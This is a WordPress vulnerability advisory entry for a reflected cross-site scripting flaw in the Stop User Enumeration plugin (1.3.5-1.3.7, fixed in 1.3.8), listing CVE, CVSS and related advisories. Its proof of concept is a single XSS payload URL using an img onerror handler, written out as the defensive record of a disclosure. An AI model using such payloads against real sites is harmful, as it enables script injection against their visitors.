WordPress Plugin Vulnerabilities

Stop User Enumeration 1.3.5-1.3.7 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

http://www.example.com/?author=1<img src=x onerror=javascript:prompt(document.domain)>

Affects Plugins

Plugin icon
stop-user-enumeration
Fixed in 1.3.8

References

CVE
CVE-2017-18536
URL
https://plugins.trac.wordpress.org/changeset/1575129/stop-user-enumeration

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Submitter
Zee Shan
Submitter twitter
@z33_5h4n
Verified
No
WPVDB ID
956cc5fd-af06-43ac-aa85-46b468c73501

Timeline

Publicly Published
2017-01-15 (about 7 years ago)
Added
2017-01-17 (about 7 years ago)
Last Updated
2020-09-22 (about 3 years ago)

Other

Published
Title
Published
2021-09-06
Title
PublishPress Editorial Calendar < 3.5.1 - Reflected Cross-Site Scripting
Published
2015-05-12
Title
Modern Theme <= 1.4.1 - DOM Cross-Site Scripting (XSS)
Published
2024-02-12
Title
Booster for WooCommerce < 7.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting
Published
2023-01-20
Title
Image Hover Effects For WPBakery Page Builder < 5.0 - Contributor+ Stored XSS
Published
2021-06-22
Title
Pricing Table by Supsystic < 1.9.5 - Reflected Cross-Site Scripting